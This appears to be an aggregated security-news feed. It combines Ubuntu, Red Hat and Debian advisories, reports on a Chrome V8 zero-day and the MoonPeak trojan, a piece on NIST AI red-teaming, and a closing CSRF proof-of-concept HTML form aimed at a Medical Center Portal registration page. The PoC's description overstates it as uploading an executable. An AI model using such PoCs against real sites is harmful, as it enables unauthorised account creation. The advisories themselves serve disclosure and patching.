Ubuntu Security Notice 6977-1 - It was discovered that QEMU did not properly handle certain memory operations, which could result in a buffer overflow. An attacker could potentially use this issue to cause a denial of service. It was discovered that QEMU did not properly handle certain memory operations, which could result in an out-of-bounds memory access. An attacker could potentially use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6977-1  
August 22, 2024

qemu vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS

Summary:

Several security issues were fixed in QEMU.

Software Description:  
- qemu: Machine emulator and virtualizer

Details:

It was discovered that QEMU did not properly handle certain memory  
operations, which could result in a buffer overflow. An attacker could  
potentially use this issue to cause a denial of service. (CVE-2024-26327)

It was discovered that QEMU did not properly handle certain memory  
operations, which could result in an out-of-bounds memory access. An  
attacker could potentially use this issue to cause a denial of service.  
(CVE-2024-26328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   qemu-system                     1:8.2.2+ds-0ubuntu1.2  
   qemu-system-arm                 1:8.2.2+ds-0ubuntu1.2  
   qemu-system-mips                1:8.2.2+ds-0ubuntu1.2  
   qemu-system-misc                1:8.2.2+ds-0ubuntu1.2  
   qemu-system-ppc                 1:8.2.2+ds-0ubuntu1.2  
   qemu-system-s390x               1:8.2.2+ds-0ubuntu1.2  
   qemu-system-sparc               1:8.2.2+ds-0ubuntu1.2  
   qemu-system-x86                 1:8.2.2+ds-0ubuntu1.2

After a standard system update you need to restart all QEMU virtual  
machines to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6977-1  
   CVE-2024-26327, CVE-2024-26328

Package Information:  
   https://launchpad.net/ubuntu/+source/qemu/1:8.2.2+ds-0ubuntu1.2

Ubuntu Security Notice USN-6977-1

Ubuntu Security Notice 6951-4 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6951-4August 21, 2024linux-bluefield vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-bluefield: Linux kernel for NVIDIA BlueField platformsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - M68K architecture;   - User-Mode Linux (UML);   - x86 architecture;   - Accessibility subsystem;   - Character device driver;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - Buffer Sharing and Synchronization framework;   - FireWire subsystem;   - GPU drivers;   - HW tracing;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - Network drivers;   - Pin controllers subsystem;   - S/390 drivers;   - SCSI drivers;   - SoundWire subsystem;   - Greybus lights staging drivers;   - TTY drivers;   - Framebuffer layer;   - Virtio drivers;   - 9P distributed file system;   - eCrypt file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - JFFS2 file system;   - Network file system client;   - NILFS2 file system;   - SMB network file system;   - Kernel debugger infrastructure;   - IRQ subsystem;   - Tracing infrastructure;   - Dynamic debug library;   - 9P file system network protocol;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - eXpress Data Path;   - XFRM subsystem;   - ALSA framework;(CVE-2024-36934, CVE-2024-38578, CVE-2024-38600, CVE-2024-27399,CVE-2024-39276, CVE-2024-38596, CVE-2024-36933, CVE-2024-36919,CVE-2024-35976, CVE-2024-37356, CVE-2023-52585, CVE-2024-38558,CVE-2024-38560, CVE-2024-38634, CVE-2024-36959, CVE-2024-38633,CVE-2024-36886, CVE-2024-27398, CVE-2024-39493, CVE-2024-26886,CVE-2024-31076, CVE-2024-38559, CVE-2024-38615, CVE-2024-36971,CVE-2024-38627, CVE-2024-36964, CVE-2024-38780, CVE-2024-37353,CVE-2024-38621, CVE-2024-36883, CVE-2024-39488, CVE-2024-38661,CVE-2024-36939, CVE-2024-38589, CVE-2024-38565, CVE-2024-38381,CVE-2024-35947, CVE-2024-36905, CVE-2022-48772, CVE-2024-36017,CVE-2024-36946, CVE-2024-27401, CVE-2024-38579, CVE-2024-38612,CVE-2024-38598, CVE-2024-38635, CVE-2024-38587, CVE-2024-38567,CVE-2024-38549, CVE-2024-36960, CVE-2023-52752, CVE-2024-27019,CVE-2024-38601, CVE-2024-39489, CVE-2024-39467, CVE-2023-52882,CVE-2024-38583, CVE-2024-39480, CVE-2024-38607, CVE-2024-36940,CVE-2024-38659, CVE-2023-52434, CVE-2024-36015, CVE-2024-38582,CVE-2024-36950, CVE-2024-38552, CVE-2024-33621, CVE-2024-36954,CVE-2024-39475, CVE-2024-39301, CVE-2024-38599, CVE-2024-36902,CVE-2024-36286, CVE-2024-38613, CVE-2024-38637, CVE-2024-36941,CVE-2024-36014, CVE-2024-38618, CVE-2024-36904, CVE-2024-36270,CVE-2024-39292, CVE-2024-39471, CVE-2022-48674)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.4.0-1090-bluefield  5.4.0-1090.97   linux-image-bluefield           5.4.0.1090.86After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6951-4   https://ubuntu.com/security/notices/USN-6951-3   https://ubuntu.com/security/notices/USN-6951-2   https://ubuntu.com/security/notices/USN-6951-1   CVE-2022-48674, CVE-2022-48772, CVE-2023-52434, CVE-2023-52585,   CVE-2023-52752, CVE-2023-52882, CVE-2024-26886, CVE-2024-27019,   CVE-2024-27398, CVE-2024-27399, CVE-2024-27401, CVE-2024-31076,   CVE-2024-33621, CVE-2024-35947, CVE-2024-35976, CVE-2024-36014,   CVE-2024-36015, CVE-2024-36017, CVE-2024-36270, CVE-2024-36286,   CVE-2024-36883, CVE-2024-36886, CVE-2024-36902, CVE-2024-36904,   CVE-2024-36905, CVE-2024-36919, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36939, CVE-2024-36940, CVE-2024-36941, CVE-2024-36946,   CVE-2024-36950, CVE-2024-36954, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36964, CVE-2024-36971, CVE-2024-37353, CVE-2024-37356,   CVE-2024-38381, CVE-2024-38549, CVE-2024-38552, CVE-2024-38558,   CVE-2024-38559, CVE-2024-38560, CVE-2024-38565, CVE-2024-38567,   CVE-2024-38578, CVE-2024-38579, CVE-2024-38582, CVE-2024-38583,   CVE-2024-38587, CVE-2024-38589, CVE-2024-38596, CVE-2024-38598,   CVE-2024-38599, CVE-2024-38600, CVE-2024-38601, CVE-2024-38607,   CVE-2024-38612, CVE-2024-38613, CVE-2024-38615, CVE-2024-38618,   CVE-2024-38621, CVE-2024-38627, CVE-2024-38633, CVE-2024-38634,   CVE-2024-38635, CVE-2024-38637, CVE-2024-38659, CVE-2024-38661,   CVE-2024-38780, CVE-2024-39276, CVE-2024-39292, CVE-2024-39301,   CVE-2024-39467, CVE-2024-39471, CVE-2024-39475, CVE-2024-39480,   CVE-2024-39488, CVE-2024-39489, CVE-2024-39493Package Information:   https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1090.97

Ubuntu Security Notice USN-6951-4

Red Hat Security Advisory 2024-5749-03 - The components for Red Hat OpenShift for Windows Containers 10.16.1 are now available.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5749.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenShift for Windows Containers 10.16.1 product releaseAdvisory ID:        RHSA-2024:5749-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5749Issue date:         2024-08-22Revision:           03CVE Names:          ====================================================================Summary: The components for Red Hat OpenShift for Windows Containers 10.16.1 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.Red Hat Product Security has rated this update as having a security impact ofModerate. A Common Vulnerability Scoring System (CVSS) base score, which givesa detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.Solution:CVEs:References:https://access.redhat.com/security/updates/classification/#moderatehttps://issues.redhat.com/browse/OCPBUGS-37609

Red Hat Security Advisory 2024-5749-03

Red Hat Security Advisory 2024-5745-03 - The components for Red Hat OpenShift for Windows Containers 10.15.3 are now available.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5745.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat OpenShift for Windows Containers 10.15.3 product release  
Advisory ID:        RHSA-2024:5745-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5745  
Issue date:         2024-08-22  
Revision:           03  
CVE Names:            
====================================================================

Summary: 

The components for Red Hat OpenShift for Windows Containers 10.15.3 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives  
a detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

Description:

Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.

Solution:

CVEs:

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://issues.redhat.com/browse/OCPBUGS-33875  
https://issues.redhat.com/browse/OCPBUGS-37533  
https://issues.redhat.com/browse/OCPBUGS-38485  
https://issues.redhat.com/browse/WINC-1289

Red Hat Security Advisory 2024-5745-03

Google has released an update to Chrome that fixes one zero-day vulnerability and introduces Google Lens for desktop.

Google has released an update for its Chrome browser which includes a patch for a vulnerability that Google says is already being exploited, known as a zero-day vulnerability.

Google has fixed that zero-day with the release of versions 128.0.6613.84/.85 for Windows/macOS and 128.0.6613.84 for Linux that will be rolled out to all users over the coming weeks.

The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To manually get the update, click **Settings > About Chrome**. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is restart the browser in order for the update to complete, and for you to be safe from those vulnerabilities.

_After the update, the version should be 128.0.6613.84/85, or later_

Besides the zero-day, this update contains 37 other security fixes, as well as Google Lens for desktop. This means you’ll be able to search anything you see on the web without leaving your current tab.

Google Lens will be available on every open tab. Here’s how to use it:

1.  Open the **Chrome menu** (three stacked dots).
2.  Select **Search with Google Lens** .
3.  Select anything on the page by clicking and dragging anywhere on the page.
4.  Refine the answers by typing in the search box in the side panel.

Keep in mind though that Google will receive a screenshot of every Google Lens search you do.

**Technical details on the zero-day vulnerability**

A zero-day is a vulnerability in software or hardware that is typically unknown to the vendor and for which no patch or other fix is available. The zero-day vulnerability which is being fixed here is referred to as CVE-2024-7971: a type confusion in V8 in Google Chrome which allowed a remote attacker to exploit heap corruption via a crafted HTML page.

JavaScript uses dynamic typing which means the type of a variable is determined and updated at runtime, as opposed to being set at compile-time in a statically typed language.

V8 is the JavaScript engine that Chrome uses and has been a significant source of security problems.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program. The outcome can be relatively benign and cause a memory leak, or it may be fatal and cause a memory fault, usually in the program that causes the corruption.

So, an attacker will have to convince a target to open a specially crafted HTML file, which usually means visiting a website. This will cause the unpatched browser to accept an unexpected value for a variable that will cause an overflow of the reserved memory location. The attacker is able to abuse that overflow for their own malicious purposes.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Google patches actively exploited zero-day in Chrome. Update now! 

Google has rolled out security fixes to address a high-severity security flaw in its Chrome browser that it said has come under active exploitation in the wild.
Tracked as CVE-2024-7971, the vulnerability has been described as a type confusion bug in the V8 JavaScript and WebAssembly engine.
"Type confusion in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to exploit heap

Browser Security / Vulnerability

Google has rolled out security fixes to address a high-severity security flaw in its Chrome browser that it said has come under active exploitation in the wild.

Tracked as **CVE-2024-7971**, the vulnerability has been described as a type confusion bug in the V8 JavaScript and WebAssembly engine.

"Type confusion in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to exploit heap corruption via a crafted HTML page," according to a description of the bug in the NIST National Vulnerability Database (NVD).

The Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC) have been credited with discovering and reporting the flaw on August 19, 2024.

No additional details about the nature of the attacks exploiting the flaw or the identity of the threat actors that may be weaponizing it have been released, primarily to ensure that a majority of the users are updated with a fix.

The tech giant, however, acknowledged in a terse statement that it's "aware that an exploit for CVE-2024-7971 exists in the wild." It's worth mentioning that CVE-2024-7971 is the third type confusion bug that it has patched in V8 this year after CVE-2024-4947 and CVE-2024-5274.

Google has so far addressed nine zero-days in Chrome since the start of 2024, including three that were demonstrated at Pwn2Own 2024 -

*   **CVE-2024-0519** - Out-of-bounds memory access in V8
*   **CVE-2024-2886** - Use-after-free in WebCodecs (demonstrated at Pwn2Own 2024)
*   **CVE-2024-2887** - Type confusion in WebAssembly (demonstrated at Pwn2Own 2024)
*   **CVE-2024-3159** - Out-of-bounds memory access in V8 (demonstrated at Pwn2Own 2024)
*   **CVE-2024-4671** - Use-after-free in Visuals
*   **CVE-2024-4761** - Out-of-bounds write in V8
*   **CVE-2024-4947** - Type confusion in V8
*   **CVE-2024-5274** - Type confusion in V8

Users are recommended to upgrade to Chrome version 128.0.6613.84/.85 for Windows and macOS, and version 128.0.6613.84 for Linux to mitigate potential threats.

Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Fixes High-Severity Chrome Flaw Actively Exploited in the Wild

A new remote access trojan called MoonPeak has been discovered as being used by a state-sponsored North Korean threat activity cluster as part of a new campaign.
Cisco Talos attributed the malicious cyber campaign to a hacking group it tracks as UAT-5394, which it said exhibits some level of tactical overlaps with a known nation-state actor codenamed Kimsuky.
MoonPeak, under active development

Cyber Espionage / Malware

A new remote access trojan called **MoonPeak** has been discovered as being used by a state-sponsored North Korean threat activity cluster as part of a new campaign.

Cisco Talos attributed the malicious cyber campaign to a hacking group it tracks as UAT-5394, which it said exhibits some level of tactical overlaps with a known nation-state actor codenamed Kimsuky.

MoonPeak, under active development by the threat actor, is a variant of the open-source Xeno RAT malware, which was previously deployed as part of phishing attacks that are designed to retrieve the payload from actor-controlled cloud services like Dropbox, Google Drive, and Microsoft OneDrive.

Some of the key features of Xeno RAT include the ability to load additional plugins, launch and terminate processes, and communicate with a command-and-control (C2) server.

Talos said the commonalities between the two intrusion sets either indicate UAT-5394 is actually Kimsuky (or its sub-group) or it's another hacking crew within the North Korean cyber apparatus that borrows its toolbox from Kimsuky.

Key to realizing the campaign is the use of new infrastructure, including C2 servers, payload-hosting sites, and test virtual machines, that have been created to spawn new iterations of MoonPeak.

"The C2 server hosts malicious artifacts for download, which is then used to access and set up new infrastructure to support this campaign," Talos researchers Asheer Malhotra, Guilherme Venere, and Vitor Ventura said in a Wednesday analysis.

"In multiple instances, we also observed the threat actor access existing servers to update their payloads and retrieve logs and information collected from MoonPeak infections."

The shift is seen as part of a broader pivot from using legitimate cloud storage providers to setting up their own servers. That said, the targets of the campaign are currently not known.

An important aspect to note here is that "the constant evolution of MoonPeak runs hand-in-hand with new infrastructure set up by the threat actors" and that each new version of the malware introduces more obfuscation techniques to thwart analysis and changes to the overall communication mechanism to prevent unauthorized connections.

"Simply put, the threat actors ensured that specific variants of MoonPeak only work with specific variants of the C2 server," the researchers pointed out.

"The timelines of the consistent adoption of new malware and its evolution such as in the case of MoonPeak highlights that UAT-5394 continues to add and enhance more tooling into their arsenal. The rapid pace of establishing new supporting infrastructure by UAT-5394 indicates that the group is aiming to rapidly proliferate this campaign and set up more drop points and C2 servers."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Deploy New MoonPeak Trojan in Cyber Campaign

The AI ethics nonprofit Humane Intelligence and the US National Institute of Standards and Technology are launching a series of contests to get more people probing for problems in generative AI systems.

At the 2023 Defcon hacker conference in Las Vegas, prominent AI tech companies partnered with algorithmic integrity and transparency groups to sic thousands of attendees on generative AI platforms and find weaknesses in these critical systems. This “red-teaming” exercise, which also had support from the US government, took a step in opening these increasingly influential yet opaque systems to scrutiny. Now, the ethical AI and algorithmic assessment nonprofit Humane Intelligence is taking this model one step further. On Wednesday, the group announced a call for participation with the US National Institute of Standards and Technology, inviting any US resident to participate in the qualifying round of a nationwide red-teaming effort to evaluate AI office productivity software.

The qualifier will take place online and is open to both developers and anyone in the general public as part of NIST's AI challenges, known as Assessing Risks and Impacts of AI, or ARIA. Participants who pass through the qualifying round will take part in an in-person red-teaming event at the end of October at the Conference on Applied Machine Learning in Information Security (CAMLIS) in Virginia. The goal is to expand capabilities for conducting rigorous testing of the security, resilience, and ethics of generative AI technologies.

“The average person utilizing one of these models doesn’t really have the ability to determine whether or not the model is fit for purpose,” says Theo Skeadas, chief of staff at Humane Intelligence. “So we want to democratize the ability to conduct evaluations and make sure everyone using these models can assess for themselves whether or not the model is meeting their needs.”

The final event at CAMLIS will split the participants into a red team trying to attack the AI systems and a blue team working on defense. Participants will use the AI 600-1 profile, part of NIST's AI risk management framework, as a rubric for measuring whether the red team is able to produce outcomes that violate the systems' expected behavior.

“NIST's ARIA is drawing on structured user feedback to understand real-world applications of AI models,” says Humane Intelligence founder Rumman Chowdhury, who is also a contractor in NIST's Office of Emerging Technologies and a member of the US Department of Homeland Security AI safety and security board. “The ARIA team is mostly experts on sociotechnical test and evaluation, and \[is\] using that background as a way of evolving the field toward rigorous scientific evaluation of generative AI.”

Chowdhury and Skeadas say the NIST partnership is just one of a series of AI red team collaborations that Humane Intelligence will announce in the coming weeks with US government agencies, international governments, and NGOs. The effort aims to make it much more common for the companies and organizations that develop what are now black-box algorithms to offer transparency and accountability through mechanisms like “bias bounty challenges,” where individuals can be rewarded for finding problems and inequities in AI models.

“The community should be broader than programmers,” Skeadas says. “Policymakers, journalists, civil society, and nontechnical people should all be involved in the process of testing and evaluating of these systems. And we need to make sure that less represented groups like individuals who speak minority languages or are from nonmajority cultures and perspectives are able to participate in this process.”

The US Government Wants You—Yes, You—to Hunt Down Generative AI Flaws

Debian Linux Security Advisory 5752-1 - Two vulnerabilities have been discovered in the IMAP implementation of large headers can result in high CPU usage, leading to denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5752-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 21, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : dovecot  
CVE ID         : CVE-2024-23184 CVE-2024-23185

Two vulnerabilities have been discovered in the IMAP implementation of  
the Dovecot mail server: Excessive numbers of address headers or very  
large headers can result in high CPU usage, leading to denial of  
service.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:2.3.19.1+dfsg1-2.1+deb12u1.

We recommend that you upgrade your dovecot packages.

For the detailed security status of dovecot please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/dovecot

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbFncMACgkQEMKTtsN8  
TjZ0xxAAveHhF56P5MPxuYoZcbzB9MyDOQrfwFs8hSc7vOtEZ0KGWmegw7elEhBx  
4x03JuhTXDZK2xrSq2VcoXZuM3Bh+p+I5OPQBvP+SFgfDyvKfoJZWedJpLFOzLyk  
X9cD56A+YyBeEE+iMaSwHp3GkR/La3xKDCobH+sbFHMlyLZrGLybLrWg5sN0By/y  
sxRGK54sVepldk7emFNdztoAG2kkl3LEZtJAQyk8gx6P2fOtjlprNFc//xoDCmzO  
K/KsDg2Nyba0Q3NwWvkre1md8bLSbxlvcxoMWOy1hP8g+1xIjejOFMet0wsBwu6S  
dAJCYy/qFKkRgOVy/IOLjWeAA3YCRJoCTNy8NNMzrjYd3J1ePH7dSAZLMW18eD4j  
lSlfjXMSe1BHoYiXGI25fBR6aNpdtJIDzgIMSDozmLFVZXwpzaRVlz3CfSQulLZn  
/u+eBrplj4cboR9YLXXYEdotrkfeIFbM8sgvzGHl3d8x8gO8+/2mqSbWGRynzJV+  
DWXVPboiury7zV5FE9IyvyCAuWfnFZZQmVzLCJ7AD4QibQl2xbU0n0lWduyc+X9y  
lHc0tn2ndrpV9oUQlOLzJJkqIQch+/rEwEOIgzrR+sPUuLFQUE8vWIDxD+cnpCSZ  
s/ClFKWH/0oDFCPwnlGbHq1a905daOK7i7Xpsn7DMaTFHwtZB08=  
=qPW3  
-----END PGP SIGNATURE-----

Debian Security Advisory 5752-1

Medical Center Portal version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Medical Center Portal 1.0 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip                                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 52.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Registration Form</title>    <style>        body {            font-family: Arial, sans-serif;            margin: 20px;            padding: 20px;            max-width: 600px;            background-color: #f4f4f4;            border-radius: 8px;        }        .form-container {            display: flex;            flex-direction: column;        }        .form-group {            margin-bottom: 15px;        }        .form-group label {            font-weight: bold;            margin-bottom: 5px;            display: block;        }        .form-group input, .form-group select {            padding: 8px;            width: 100%;            border: 1px solid #ccc;            border-radius: 4px;        }        .form-group select {            cursor: pointer;        }        .form-group button {            padding: 10px 15px;            background-color: #007bff;            color: white;            border: none;            cursor: pointer;            border-radius: 4px;        }        .form-group button:hover {            background-color: #0056b3;        }    </style></head><body>    <h2>Registration Form</h2>    <form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container">        <div class="form-group">            <label for="firstname">First Name:</label>            <input type="text" id="firstname" name="firstname" required>        </div>        <div class="form-group">            <label for="nid">National ID (NID):</label>            <input type="text" id="nid" name="nid" required>        </div>        <div class="form-group">            <label for="gender">Gender:</label>            <select id="gender" name="gender" required>                <option value="">Select Gender</option>                <option value="male">Male</option>                <option value="female">Female</option>            </select>        </div>        <div class="form-group">            <label for="email">Email:</label>            <input type="email" id="email" name="email" required>        </div>        <div class="form-group">            <label for="phonenumber">Phone Number:</label>            <input type="text" id="phonenumber" name="phonenumber" required>        </div>        <div class="form-group">            <label for="jobs">Job:</label>            <select id="jobs" name="jobs" required>                <option value="">Select Job</option>                <option value="doctor">Doctor</option>                <option value="nurse">Nurse</option>                <option value="pharmacist">Pharmacist</option>            </select>        </div>        <div class="form-group">            <label for="province">Province:</label>            <select id="province" name="province" required>                <option value="">Select Province</option>                <option value="province1">Province 1</option>                <option value="province2">Province 2</option>                <option value="province3">Province 3</option>            </select>        </div>        <div class="form-group">            <label for="city">City:</label>            <select id="city" name="city" required>                <option value="">Select City</option>                <option value="city1">City 1</option>                <option value="city2">City 2</option>                <option value="city3">City 3</option>            </select>        </div>        <div class="form-group">            <label for="username">Username:</label>            <input type="text" id="username" name="username" required>        </div>        <div class="form-group">            <label for="password">Password:</label>            <input type="password" id="password" name="password" required>        </div>        <div class="form-group">            <button type="submit">Register</button>        </div>    </form></body></html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#mac